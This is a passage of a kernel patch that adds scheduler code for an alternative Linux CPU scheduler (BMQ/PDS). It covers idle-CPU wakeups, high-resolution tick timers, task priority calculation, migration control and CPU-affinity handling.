++	return cpu;
++}
++
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/*
++	 * Alt schedule FW doesn't support sched_feat yet:
++	if (!sched_feat(HRTICK))
++		return 0;
++	*/
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
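++
++/*
++ * Worked example: a SCHED_FIFO task with rt_priority 50 maps to
++ * prio = MAX_RT_PRIO - 1 - 50 = 49, while a SCHED_NORMAL task at nice 0
++ * (static_prio 120) maps to 120 + MAX_PRIORITY_ADJ, with
++ * MAX_PRIORITY_ADJ supplied by the BMQ/PDS header included above.
++ */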
++
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are RT tasks or we were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	trace_sched_migrate_task(p, new_cpu);
++
++	if (task_cpu(p) != new_cpu) {
++		rseq_migrate(p);
++		perf_event_task_migrate(p);
++	}
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on an allowed CPU
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
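++
++/*
++ * Usage sketch: migrate_disable()/migrate_enable() nest via the
++ * migration_disabled counter, so the following is safe:
++ *
++ *	migrate_disable();
++ *	cpu = smp_processor_id();	(stable, the task cannot migrate)
++ *	...
++ *	migrate_enable();
++ */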
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non-kernel threads are not allowed during either online or offline transitions. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to a new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_preempt_mask(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, struct affinity_context *ctx)
++{
++	cpumask_copy(&p->cpus_mask, ctx->new_mask);
++	p->nr_cpus_allowed = cpumask_weight(ctx->new_mask);
++
++	/*
++	 * Swap in a new user_cpus_ptr if SCA_USER flag set
++	 */
++	if (ctx->flags & SCA_USER)
++		swap(p->user_cpus_ptr, ctx->user_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, struct affinity_context *ctx)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, ctx);
++}
++
++/*
++ * Used for kthread_bind() and select_fallback_rq(); in both cases the user
++ * affinity (if any) should be destroyed too.
++ */
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	struct affinity_context ac = {
++		.new_mask  = new_mask,
++		.user_mask = NULL,
++		.flags     = SCA_USER,	/* clear the user requested mask */
++	};
++	union cpumask_rcuhead {
++		cpumask_t cpumask;
++		struct rcu_head rcu;
++	};
++
++	__do_set_cpus_allowed(p, &ac);
++
++	/*
++	 * Because this is called with p->pi_lock held, it is not possible
++	 * to use kfree() here (when PREEMPT_RT=y), therefore punt to using
++	 * kfree_rcu().
++	 */
++	kfree_rcu((union cpumask_rcuhead *)ac.user_mask, rcu);
++}
++
++static cpumask_t *alloc_user_cpus_ptr(int node)
++{
++	/*
++	 * See do_set_cpus_allowed() above for the rcu_head usage.
++	 */
++	int size = max_t(int, cpumask_size(), sizeof(struct rcu_head));
++
++	return kmalloc_node(size, GFP_KERNEL, node);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	cpumask_t *user_mask;
++	unsigned long flags;
++
++	/*
++	 * Always clear dst->user_cpus_ptr first, as the two tasks'
++	 * user_cpus_ptr values may differ by now due to racing.
++	 */
++	dst->user_cpus_ptr = NULL;
++
++	/*
++	 * This check is racy and losing the race is a valid situation.
++	 * It is not worth the extra overhead of taking the pi_lock on
++	 * every fork/clone.
++	 */
++	if (data_race(!src->user_cpus_ptr))
++		return 0;
++
++	user_mask = alloc_user_cpus_ptr(node);
++	if (!user_mask)
++		return -ENOMEM;
++
++	/*
++	 * Use pi_lock to protect content of user_cpus_ptr
++	 *
++	 * Though unlikely, user_cpus_ptr can be reset to NULL by a concurrent
++	 * do_set_cpus_allowed().
++	 */
++	raw_spin_lock_irqsave(&src->pi_lock, flags);
++	if (src->user_cpus_ptr) {
++		swap(dst->user_cpus_ptr, user_mask);
++		cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	}
++	raw_spin_unlock_irqrestore(&src->pi_lock, flags);
++
++	if (unlikely(user_mask))
++		kfree(user_mask);
++
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even sure that "rq" stays as the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
++
++/***
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    prevent the load balancer from placing new tasks on the to-be-removed
++ *    CPU. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select the CPU on the other node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave the kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
++
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t allow_mask, mask;
++
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
++
++	return best_mask_cpu(task_cpu(p), &allow_mask);
++}
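++
++/*
++ * Descriptive note: the selection order above is (1) a fully idle SMT
++ * group, (2) any idle CPU, (3) a CPU running at a lower priority than @p
++ * according to the preempt mask, and finally (4) any allowed CPU, with
++ * best_mask_cpu() picking from the chosen mask relative to task_cpu(p).
++ */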
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task; it's something
++		 * userspace knows about and won't get confused about.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in pieces.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 struct affinity_context *ctx,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
